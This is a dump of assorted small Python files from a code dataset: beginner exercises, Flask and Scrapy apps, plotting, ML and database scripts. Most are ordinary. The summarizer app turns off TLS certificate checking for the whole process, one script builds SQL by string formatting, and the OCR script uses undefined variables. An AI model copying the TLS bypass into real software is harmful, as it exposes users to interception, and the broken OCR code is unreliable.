msg)\n\n","sub_path":"python/soma_workflow/test/workflow_tests/workflow_test.py","file_name":"workflow_test.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75555323","text":"print('json-序列化')\n\nimport json\n\n#json 序列化\ndic = {'name':'clp','age':18}\nprint(dic)\nf = open('E:\\python_text\\jsontext','w')\nf.write(json.dumps(dic))\nf.close()\n#简便方法 相当于上两句\n#json.dump(dic,f)\n\n# 反序列化json\nf = open('E:\\python_text\\jsontext','r')\ndata = f.read()\njson = json.loads(data)\n#data = json.loads(f)\nprint(data)\n\n\nimport shelve\n# 编辑字典\nf = shelve.open('E:\\python_text\\shelve_text')\nf['info'] = {'name':'clp','age':18}\nf['ccc'] =['1,2,3,4']\n# 读取\ndata = f.get('info')\ndata1 = f.get('ccc')\nprint(data,data1)\n\n# 插曲\ndic = {'name':'clp','age':18}\ndata = dic.get('name','没有哦') #字典通过键的名字去取值,如果有就返回取到的,没有就返回\"没有哦\"\nprint(data)","sub_path":"json-demo_9_3.py","file_name":"json-demo_9_3.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"307095886","text":"import ChemicsWS # The import will instanciate the WS\nfrom flask import Flask, url_for\nimport logging\nimport os\n\n\n#DEBUGMODE = True\nDEBUGMODE = False\nDEBUGLOGFILE = \"DebugLogFile.txt\"\nPORT = 8081 \n#PORT = 80 \n#PORT = 22 \n\n\nif not DEBUGMODE:\n ChemicsWS.app.debug = False\n threadMode = True\nelse:\n ChemicsWS.app.debug = True\n threadMode = False\n\nif not DEBUGMODE:\n logSid = logging.StreamHandler()\n logSid.setLevel(logging.WARNING)\n logSid.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s ' '[in %(pathname)s:%(lineno)d]'))\n ChemicsWS.app.logger.addHandler(logSid)\nelse:\n logFid = logging.FileHandler(DEBUGLOGFILE, \"w\") \n #logFid.setLevel(logging.WARNING)\n logFid.setLevel(logging.INFO)\n logFid.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s ' '[in %(pathname)s:%(lineno)d]'))\n ChemicsWS.app.logger.addHandler(logFid)\n ChemicsWS.app.logger.warning('Initializing the log file')\n\n# Start the WS\nChemicsWS.app.run(host='0.0.0.0', port=PORT, threaded=threadMode, use_reloader=False)\n","sub_path":"ChemicsWS/ChemicsWS/startChemics_iLab.py","file_name":"startChemics_iLab.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"207913910","text":"##Faça um programa que peça dois números inteiros e imprima a soma desses dois números\n\nsomar=True\nwhile somar !=False:\n x= int(input(\"informe o primeiro número para ser somado: \\n\"))\n y= int(input(\"informe o segundo número para ser somado: \\n\"))\n print(\"A soma dos dois números é: %d \" % (x+y))\n\n\n #controle do laço\n pergunta=input(\"Deseja fazer nova soma: \\n\")\n if pergunta==\"sim\":\n somar=True\n else:\n somar=False\n\n","sub_path":"lista_1_questão_1.py","file_name":"lista_1_questão_1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521573773","text":"# Getting input to determine if numbers are even or odd\ndef user_input_eve_or_odd():\n number = int(input('Give me a number and I will tell you if it is even or odd? '))\n check_if_even_or_odd = number % 2\n\n if check_if_even_or_odd == 0:\n print(f\"{number} is Even\")\n else:\n print(f\"{number} is Odd\")\nuser_input_eve_or_odd()\n\n# Is 'Number' a multiple of 4\ndef is_number_multiple_of_4():\n number = int(input('Give me a number and I will tell you if it is a multiple of 4... '))\n \n if number % 4 == 0: \n print(f\"Yes, {number} is a multiple of 4\")\n else:\n print(f\"No, {number} is not a multiple of 4\")\n\nis_number_multiple_of_4()\n\n# Does 'Num' divide evenly into 'Check'\ndef is_it_divisible():\n num = int(input('Give me a number to be divided... '))\n check = int(input(f\"Give me a number that {num} will be divided by... \"))\n \n if num % check == 0:\n print(f\"The numbers {num} and {check} are Evenly Divisible\")\n else:\n print(f\"The numbers {num} and {check} are Not Evenly Divisible\")\n\nis_it_divisible()\n","sub_path":"week2/evenOrOdd/evenOrOdd.py","file_name":"evenOrOdd.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456557135","text":"from __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\nfrom flask import Flask, request, jsonify,render_template\n\nfrom sumy.parsers.html import HtmlParser\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lsa import LsaSummarizer as Summarizer\nfrom sumy.nlp.stemmers import Stemmer\nfrom sumy.utils import get_stop_words\n\nimport nltk\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n pass\nelse:\n ssl._create_default_https_context = _create_unverified_https_context\n\nnltk.download('stopwords')\nnltk.download('punkt')\n\nLANGUAGE = \"english\"\nSENTENCES_COUNT = 10\n\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n\n@app.route('/api/summarize', methods=['POST'])\ndef summarize():\n \"\"\" Returns summary of articles \"\"\"\n if request.method == 'POST':\n url = request.form['pageurl']\n parser = HtmlParser.from_url(url, Tokenizer(LANGUAGE))\n stemmer = Stemmer(LANGUAGE)\n\n summarizer = Summarizer(stemmer)\n summarizer.stop_words = get_stop_words(LANGUAGE)\n\n final = []\n\n for sentence in summarizer(parser.document, SENTENCES_COUNT):\n final.append(str(sentence))\n return render_template('result.html', len=len(final), summary=final)\n\nif __name__ == '__main__':\n app.run(debug=True, host='127.0.0.1', port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"79861447","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Weban spider created on top of the ATSSpider\nscrapy crawl weban -a url=\"http://weban.jp/webapp/gen/search/prefectureSearch/result?A3=1308&CMD=300&FID=275&V1=21&Z1=029&A1=03&V25=1&Z2=140044\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://weban.jp/webapp/gen/search/prefectureSearch/result?A3=1307&CMD=300&FID=275&V1=21&Z1=029&A1=03&V25=1&Z2=140044\n\"\"\"\nfrom re import compile\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, HtmlFormatter\n\n\nclass Weban(ATSSpider):\n\n name = \"weban\"\n ref_re = compile(\"/(\\d+)\\.\")\n download_delay = 10\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//div[@class='shopSummaryTypeA01']\")\n for job in jobs:\n job_link = job.xpath(\".//p[@class='catch']/a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\n \".//p[@class='catch']/a/text()\"\n ).extract(),\n 'company': job.xpath(\n \".//h2[@class='heading']/a/text()\"\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n next_page = sel.xpath(\"//li[@class='paging_next']/a/@href\").extract()\n if next_page:\n yield Request(\n url=next_page[0], callback=self.parse\n )\n\n def parse_job(self, response):\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('company', response.meta['company'])\n loader.add_value(\n \"referencenumber\", response.url, Prefix(\"%s-\" % self.name),\n re=self.ref_re\n )\n loader.add_xpath(\n \"description\",\n \"//div[@class='columnTypeC01']/div[@class='column']/table\",\n HtmlFormatter()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/weban.py","file_name":"weban.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"233968223","text":"import _mssql\r\nimport uuid\r\nimport decimal\r\nimport pymssql\r\nfrom openpyxl import *\r\nfrom common.sql import con\r\n\r\nsites=[x.value for x in load_workbook(\"siteList.xlsx\").worksheets[0].columns[0]]\r\nwb=Workbook()\r\nU3G=wb.create_sheet(index=0, title=\"U3G\")\r\nU2G=wb.create_sheet(index=0, title=\"U2G\")\r\nG3G=wb.create_sheet(index=0, title=\"G3G\")\r\nG2G=wb.create_sheet(index=0, title=\"G2G\")\r\ncon=con()\r\nfor site in sites:\r\n query=\"\"\"SELECT *\r\n FROM [o].[h_G2GNCELL]\r\n WHERE CELLNAME LIKE '%%%s_'\r\n \"\"\"%str(site).zfill(4)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n G2G.append([x[0] for x in cur.description])\r\n for x in result:\r\n G2G.append(x)\r\n cur.close() \r\n \r\n query=\"\"\"SELECT *\r\n FROM [o].[h_G3GNCELL]\r\n WHERE CELLNAME LIKE '%%%s_'\r\n \"\"\"%str(site).zfill(4)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n G3G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n G3G.append(x)\r\n cur.close()\r\n \r\n query=\"\"\"SELECT *\r\n FROM [o].[h_U2GNCELL]\r\n WHERE CELLNAME LIKE '%%%s0__'\r\n \"\"\"%str(site).zfill(5)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n U2G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n U2G.append(x)\r\n cur.close()\r\n\r\n query=\"\"\"SELECT *\r\n FROM [o].[h_U3GNCELL]\r\n WHERE CELLNAME LIKE '%%%s0__'\r\n \"\"\"%str(site).zfill(5)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n U3G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n U3G.append(x)\r\n cur.close() \r\n \r\nwb.save(\"1.xlsx\") \r\n \r\n \r\n \r\n","sub_path":"miscellaneous/lsNbrRnpBySite.py","file_name":"lsNbrRnpBySite.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"493143488","text":"#https://blog.csdn.net/haodawei123/article/details/90517274\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4, suppress=True)\nfreq = random.randint(0,10)\nt = np.arange(-10*np.pi, 10*np.pi, 0.1*np.pi)\n# ft = 10*np.sin(t)\nft = 10*np.cos(freq*t)\nfi = np.fft.ifft(ft)\nfr = np.fft.fft(fi)\n\nprint('ft=', ft)\nprint('fr=', fr)\nprint('fi=', fi)\n\n\nprint('freq=', freq)\n\nplt.plot(t,ft,label=\"$y = 10 sin(f x)$\", color=\"red\", linewidth=2)\nplt.plot(t,fi,label=\"ifft: y$\", color=\"blue\", linewidth=2)\nplt.plot(t,fr,label=\"fr: y$\", color=\"white\", linewidth=1)\nplt.show()\n","sub_path":"homework/W10/4/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"227349111","text":"\n\n###########################################\n# Plot Maker for quick plots in Zll channel\n#\n# by David Curry\n#\n# 2.25.2015\n###########################################\n\nimport sys\nimport os\nimport re\nimport fileinput\nimport subprocess\nimport numpy as np\nfrom decimal import *\nfrom ROOT import *\nfrom ROOT import gROOT\nfrom matplotlib import interactive\n\nfile = TFile('/exports/uftrig01a/dcurry/heppy/files/prep_out/v23_7_18_ZH125.root')\ntree = file.Get('tree')\n\nfile_ttbar = TFile('/exports/uftrig01a/dcurry/heppy/files/prep_out/v23_7_18_Zuu.root')\ntree_ttbar = file_ttbar.Get('tree')\n\ncut = 'Vtype > -1 & Vtype < 2 & Jet_pt[hJCidx[0]] > 20. & Jet_pt[hJCidx[1]] > 20. & abs(Jet_eta[hJCidx[0]]) < 2.4 & abs(Jet_eta[hJCidx[1]]) < 2.4'\n\ndata_cut = cut + ' & (HLT_BIT_HLT_IsoMu20_v || HLT_BIT_HLT_IsoTkMu20_v)'\n\n# Djet Mass\nc1 = TCanvas('c1')\ns1 = THStack('s1', '')\n\nc1.cd()\n\nh1 = TH2F('h1', '', 50, 20, 220, 30, 0.5, 1.5)\nh2 = TH2F('h2', '', 50, 20, 220, 30, 0.5, 1.5)\n\ntree.Project('h1', 'Jet_corr:Jet_pt', cut)\ntree_ttbar.Project('h2', \"(Jet_pt/Jet_rawPt):Jet_pt\", data_cut)\n\n\n# normalize\n#h1.Scale(1 / h1.Integral())\n#h2.Scale(1 / h2.Integral())\n\nh1.SetLineWidth(2)\nh1.SetStats(0)\n\n # get the profiles\nprof_mc = h1.ProfileX()\nprof_mc.SetLineColor(kRed)\nprof_data = h2.ProfileX()\nprof_data.SetLineColor(kBlack)\n\nprof_mc.SetMinimum(0.95)\nprof_mc.SetMaximum(1.15)\n\nprof_mc.SetStats(0)\nprof_mc.Draw()\nprof_data.Draw('same')\nprof_mc.GetXaxis().SetTitle('Jet pT')\nprof_mc.GetYaxis().SetTitle('Jet Correction')\n\n#h2.SetLineColor(kRed)\n#h2.SetLineWidth(2)\n#h2.SetFillStyle(3335)\n#h2.SetFillColor(kRed)\n\n#s1.Add(h2)\n#s1.Add(h1)\n#s1.Draw('nostack')\n#s1.GetXaxis().SetTitle('Generator Jet p_{T} [GeV]')\n\n\nleg = TLegend(0.62,0.7,0.9,0.9)\nleg.SetFillStyle(0)\nleg.SetBorderSize(0)\nleg.AddEntry(prof_mc, 'ZH125', 'l')\nleg.AddEntry(prof_data, 'Data', 'l')\nleg.Draw('same')\n\nc1.SaveAs('plots/jet_corr.pdf')\n\n\nraw_input('press return to continue')\n\n# Delete objects.\nc1.IsA().Destructor(c1)\ns1.IsA().Destructor(s1)\nh1.IsA().Destructor(h1)\nh2.IsA().Destructor(h2)\n\n\n'''\n\n# dijet mAss\nc1 = TCanvas('c1')\ns1 = THStack('s1', '')\n\nc1.cd()\n\ntree.Draw('HCSV_mass >> h3(50,20,220)')\ntree_ttbar.Draw('HCSV_mass >> h4(50,20,220)')\n\n# normalize\nh3.Scale(1 / h3.Integral())\nh4.Scale(1 / h4.Integral())\n\nh3.SetLineWidth(2)\nh3.SetStats(0)\n\nh4.SetLineColor(kRed)\nh4.SetLineWidth(2)\nh4.SetFillStyle(3335)\nh4.SetFillColor(kRed)\n\ns1.Add(h4)\ns1.Add(h3)\ns1.Draw('nostack')\ns1.GetXaxis().SetTitle('M(jj) [GeV]')\n\n\nleg = TLegend(0.62,0.6,0.9,0.9)\nleg.SetFillStyle(0)\nleg.SetBorderSize(0)\nleg.AddEntry(h3, 'ZH125', 'l')\nleg.AddEntry(h4, 'ttbar', 'l')\nleg.Draw('same')\n\nc1.SaveAs('plots/mjj.pdf')\n\n\nraw_input('press return to continue')\n\n# Delete objects.\nc1.IsA().Destructor(c1)\ns1.IsA().Destructor(s1)\nh3.IsA().Destructor(h3)\nh4.IsA().Destructor(h4)\n\n\n'''\n\n\nraw_input('press return to continue')\n \n \n","sub_path":"myMacros/simple_plotters/simple_zll_HistMaker.py","file_name":"simple_zll_HistMaker.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"512039479","text":"import architecture\nimport tensorflow as tf\nimport Architectures.Layers.inception_resnet_a as ira\nimport Architectures.Layers.inception_resnet_b as irb\nimport Architectures.Layers.inception_resnet_c as irc\nimport Architectures.Layers.guidedfilter_color_trainable_test as gct\n\nclass DeepdiveSibigrapiGuided5(architecture.Architecture):\n def __init__(self):\n parameters_list = ['input_size', 'summary_writing_period',\n \"validation_period\", \"model_saving_period\"]\n\n self.config_dict = self.open_config(parameters_list)\n self.input_size = self.config_dict[\"input_size\"][0:2]\n\n def prediction(self, sample, training=False):\n \" Coarse-scale Network\"\n normalizer_params = {'is_training':training, 'center':True,\n 'updates_collections':None, 'scale':True}\n conv1 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=16, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n \n module_a = ira.inception_resnet_a(conv1, normalizer_params)\n module_b = irb.inception_resnet_b(module_a, normalizer_params)\n module_c = irc.inception_resnet_c(module_b, normalizer_params)\n\n\n conv2 = tf.contrib.layers.conv2d(inputs=module_c, num_outputs=3, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.tanh)\n\n guided_list = []\n for i in range(3):\n if i == 0:\n reuse = None\n else:\n reuse = True\n \n with tf.variable_scope(\"guided\",reuse=reuse):\n conv2_layer =tf.expand_dims(conv2[:,:,:,i], -1) \n guided_layer = gct.guidedfilter_color_treinable(sample, conv2_layer, r=20, eps=10**-3)\n guided_list.append(guided_layer)\n\n guided_list.append(sample)\n guided_plus_skip = tf.concat(guided_list, 3)\n conv3 = tf.contrib.layers.conv2d(inputs=guided_plus_skip, num_outputs=3, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=None)\n \n const_1 = tf.constant(1, dtype=tf.float32)\n brelu2 = tf.minimum(const_1, tf.nn.relu(conv3))\n tf.summary.image(\"architecture_output\", brelu2)\n return brelu2\n\n\n\n def get_validation_period(self):\n return self.config_dict[\"validation_period\"]\n\n def get_model_saving_period(self):\n return self.config_dict[\"model_saving_period\"]\n\n def get_summary_writing_period(self):\n return self.config_dict[\"summary_writing_period\"]\n","sub_path":"Architectures/ProjectDeepdive/sibigrapi/deepdive_sibigrapi_guided5.py","file_name":"deepdive_sibigrapi_guided5.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76287888","text":"from django.core.urlresolvers import reverse\nfrom rest_framework import serializers\n\nfrom .models import Province, Region\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n regions = serializers.SerializerMethodField(method_name='get_regions_url')\n\n class Meta:\n model = Province\n\n fields = (\n 'name',\n 'name_en',\n 'name_ru',\n 'name_uz',\n 'regions',\n 'code',\n )\n\n def get_regions_url(self, obj):\n return self.context['request'].build_absolute_uri(\n reverse('address-api:province_regions', kwargs={'province': obj.code}))\n\n\nclass RegionSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Region\n\n fields = (\n 'name',\n 'name_en',\n 'name_ru',\n 'name_uz',\n 'code',\n )\n\n","sub_path":"uzbplaces/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134981686","text":"import random\nimport time\nimport socket\n\nclass Player:\n\n def __init__(self, name):\n self.name = name\n\n def get_input(self, board):\n x = int(input(\"Enter x:\"))\n y = int(input(\"Enter y:\"))\n return x, y\n\n\nclass Board:\n def __init__(self):\n self.matrix = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n\n def set(self, player_key, row, column):\n if row < 0 or row > 2 or column < 0 or column > 2:\n return False\n if self.matrix[row][column] != 0:\n return False\n self.matrix[row][column] = player_key\n return True\n\n def is_full(self):\n for i in range(0,3):\n for j in range(0,3):\n if self.matrix[i][j] == 0:\n return False\n return True\n\n def is_game_over(self):\n for i in range(0,3):\n ok = True\n for j in range(0,3):\n if self.matrix[i][j] != self.matrix[i][0]:\n ok = False\n if ok == True and self.matrix[i][0] != 0:\n return self.matrix[i][0]\n\n for j in range(0,3):\n ok = True\n for i in range(0,3):\n if self.matrix[i][j] != self.matrix[0][j]:\n ok = False\n if ok == True and self.matrix[0][j] != 0:\n return self.matrix[0][j]\n\n if self.matrix[0][0] == self.matrix[1][1] and self.matrix[1][1] == self.matrix[2][2] and self.matrix[0][0] != 0:\n return self.matrix[0][0]\n\n if self.matrix[0][2] == self.matrix[1][1] and self.matrix[2][0] == self.matrix[1][1] and self.matrix[1][1] != 0:\n return self.matrix[1][1]\n\n if self.is_full() == True:\n return 3\n else:\n return 0\n\n def draw(self):\n print(\"{} {} {}\\n{} {} {}\\n{} {} {}\".format(*[self.matrix[i][j] for i in range(0,3) for j in range(0,3)]))\n\nclass Game:\n\n def __init__(self):\n self.player1 = Player(\"PlayerOne\")\n self.player2 = Player(\"PlayerTwo\")\n self.board = Board()\n self.game_loop()\n\n def game_loop(self):\n pindex = 1\n ownIndex = 0\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect(('127.0.0.1', 65432))\n\n ownIndex = int(s.recv(1024))\n print(\"You are player %d\" % ownIndex)\n\n data = (0,0)\n\n while True:\n\n self.board.draw()\n\n print(\"Player %d turn:\" % pindex)\n coord = (-1, -1)\n if pindex != ownIndex:\n x = s.recv(1024)\n y = s.recv(1024)\n coord = (int(x), int(y))\n if not coord:\n break\n else:\n if ownIndex == 1:\n coord = self.player1.get_input(self.board)\n else:\n coord = self.player2.get_input(self.board)\n s.send(str(coord[0]).encode(\"utf-8\"))\n s.send(str(coord[1]).encode(\"utf-8\"))\n\n time.sleep(1)\n if coord[0] > 2 or coord [0] < 0 or coord[1] > 2 or coord [1] < 0:\n print(\"Incorrect coordinates\")\n s.send(str(pindex).encode('utf-8'))\n continue\n\n if not self.board.set(pindex, *coord):\n print(\"Invalid choice\")\n s.send(str(pindex).encode('utf-8'))\n continue\n\n state = self.board.is_game_over()\n\n if state == 1 or state == 2:\n print(\"Player %d wins:\" % pindex)\n self.board.draw()\n break\n elif state == 3:\n print(\"The game ended in draw\")\n self.board.draw()\n break\n\n pindex = pindex % 2 + 1\n s.send(str(pindex).encode('utf-8'))\n\ngame = Game()","sub_path":"labs/firststef/05_week/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106686915","text":"def cuberoot2(x0):\n x = x0\n i = 0\n while True:\n nextIt = (1/3)*(2*x+2/(x**2))\n if (abs(nextIt - x) <= 10**-7):\n break\n else:\n i += 1\n x = nextIt\n print(\"The sequence starting at\", x0, \"converges to\", x,\"in\", i, \"iterations.\")\n\ncuberoot2(20)\n\ndef nesty(x):\n f = (x - 1) ** 5\n g = x ** 5 - 5 * x ** 4 + 10 * x ** 3 - 10 * x ** 2 + 5 * x -1\n h = x * (5 - x * (10 - x * (10 - x * (5 - x)))) - 1\n print(\"x =\", x, \", f(x) =\", f, \", g(x) =\", g, \", h(x) =\", h)\n\nfor i in range(1,8):\n nesty(1 + 10 ** -i)\n\n#the answer *should* be (10^-n)^5 = 10 ^ -5n. With n ranging from 1 to 7, that goes as low as 10 ^ -35! This means that we want to minimize our loss of significance or face massive relative error\n#f minimized the number of operations (in particular subtraction) to the answer, thereby minimizing loss of significance and the relative error\n#therefore f output the best results\n#on the other hand, g and h had more subtraction, resulting in greater loss of significance, worse relative error, and worse results","sub_path":"Numerical Methods, Analysis, and Computation/Numerical Methods and Analysis/Roots-And-Error.py","file_name":"Roots-And-Error.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641030794","text":"\r\nfrom tensorflow.keras.models import load_model\r\nfrom imutils.contours import sort_contours\r\nimport numpy as np\r\nimport imutils\r\nimport cv2\r\n\r\n\r\nprint(\"Loading model:\")\r\nmodel = load_model('model2.h5')\r\n\r\ntestImage = cv2.imread('test7.jpg')\r\ngray = cv2.cvtColor(testImage, cv2.COLOR_BGR2GRAY)\r\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\nedged = cv2.Canny(blurred, 30, 150)\r\nconts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,\r\n\tcv2.CHAIN_APPROX_SIMPLE)\r\nconts = imutils.grab_contours(conts)\r\nconts = sort_contours(conts, method=\"left-to-right\")[0]\r\n\r\nLetters = []\r\n\r\nfor c in conts:\r\n\t(x, y, Width, Height) = cv2.boundingRect(c)\r\n\tif (w >= 5 and w <= 150) and (Height >= 15 and Height <= 120):\r\n\t\troi = gray[y:y + Height, x:x + w]\r\n\t\tthresh = cv2.threshold(roi, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n\t\t(tH, tW) = thresh.shape\r\n\r\n\t\tif tW > tH:\r\n\t\t\tthresh = imutils.resize(thresh, width=28)\r\n\t\telse:\r\n\t\t\tthresh = imutils.resize(thresh, height=28)\r\n\r\n\t\t(tH, tW) = thresh.shape\r\n\t\tdX = int(max(0, 28 - tW) / 2.0)\r\n\t\tdY = int(max(0, 28 - tH) / 2.0)\r\n\r\n\t\tpadded = cv2.copyMakeBorder(thresh, top=dY, bottom=dY, left=dX, right=dX, borderType=cv2.BORDER_CONSTANT, value=(0, 0, 0))\r\n\t\tpadded = cv2.resize(padded, (28, 28))\r\n\r\n\t\tpadded = padded.astype(\"float32\") / 255.0\r\n\t\tpadded = np.expand_dims(padded, axis=-1)\r\n\r\n\t\tLetters.append((padded, (x, y, w, h)))\r\n\t\t\r\n\r\n\r\nboxes = [b[1] for b in Letters]\r\nLetters = np.array([c[0] for c in Letters], dtype=\"float32\")\r\n\r\npreds = model.predict(chars)\r\n\r\nlabelNames = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nlabelNames = [l for l in labelNames]\r\n\r\n\r\nfor (pred, (x, y, w, h)) in zip(preds, boxes):\r\n\ti = np.argmax(pred)\r\n\tprob = pred[i]\r\n\tlabel = labelNames[i]\r\n\tprint(\"Letter {} - {:.2f}% chance of being accurate\".format(label, prob * 100))\r\n\tcv2.rectangle(testImage, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\tcv2.putText(testImage, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 255, 0), 2)\r\n\t\t\r\n\tcv2.imshow(\"Image\", testImage)\r\n\tcv2.waitKey(0)","sub_path":"OCR3.py","file_name":"OCR3.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17227575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport redis\n\n__author__ = 'dz0ny'\n__email__ = 'dz0ny@ubuntu.si'\n__version__ = '0.0.3'\n\nclass Enviroment:\n # Singleton\n\n database = redis.StrictRedis.from_url(\n os.getenv('REDISTOGO_URL', 'redis://localhost:6379')\n )","sub_path":"yodl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"35851452","text":"import numpy as np\r\nimport csv\r\nimport pymysql\r\n\r\ndata_file = open(\"data.txt\")\r\ncount= 0\r\ndate=[]\r\ncountries=[]\r\nfor aline in data_file.readlines(): #read each line of text file\r\n aline.strip(\"\\n\")\r\n count=count+1\r\n if count>11:\r\n values=aline.split(',') #seperate values by comma\r\n countries.append(values[1:]) #store in countries array\r\n date.append(values[0])\r\n#print(date[0])\r\ndate= np.array(date)\r\ncountry=np.array(countries)\r\ncountry[:,-1] = [w.replace('\\n', '') for w in country[:,-1]]\r\ndata=np.column_stack((date,country))\r\ndata1=[[char or 0 for char in i]for i in data]\r\n\r\nconnection = pymysql.connect(host='localhost',\r\n user='root',\r\n cursorclass=pymysql.cursors.DictCursor)\r\ntry:\r\n with connection.cursor() as cursor:\r\n # Create a new record\r\n \r\n cursor.execute(\"CREATE DATABASE WORLDFLUDATABASE\")\r\n\r\n # connection is not autocommit by default. So you must commit to save\r\n # your changes.\r\n connection.commit()\r\n\r\n with connection.cursor() as cursor:\r\n # Create table coloumn\r\n cursor.execute(\"CREATE TABLE WORLDFLUDATABASE.FLUDATA(Date DATE,Argentina INT,Australia INT,Austria INT,Belgium INT,Bolivia INT,Brazil INT,Bulgaria INT,Canada INT,Chile INT,France INT,Germany INT,Hungary INT,Japan INT,Mexico INT,Netherlands INT,NewZealand INT,Norway INT,Paraguay INT,Peru INT,Poland INT,Romania INT,Russia INT,SouthAfrica INT,Spain INT,Sweden INT,Switzerland INT,Ukraine INT,UnitedStates INT,Uruguay INT)\")\r\n connection.commit()\r\n\r\n with connection.cursor() as cursor:\r\n for i in range(1,np.shape(data1)[0]):\r\n cursor.execute(\"INSERT INTO WORLDFLUDATABASE.FLUDATA(Date,Argentina,Australia,Austria,Belgium,Bolivia,Brazil,Bulgaria,Canada,Chile,France,Germany,Hungary,Japan,Mexico,Netherlands,NewZealand,Norway,Paraguay,Peru,Poland,Romania,Russia,SouthAfrica,Spain,Sweden,Switzerland,Ukraine,UnitedStates,Uruguay) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",[char for char in data1[i]])\r\n connection.commit()\r\n#### Q1 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA WHERE Date BETWEEN '2003-08-01' AND '2003-08-31'\")\r\n connection.commit()\r\n\r\n#### Q2 ####\r\n with connection.cursor() as 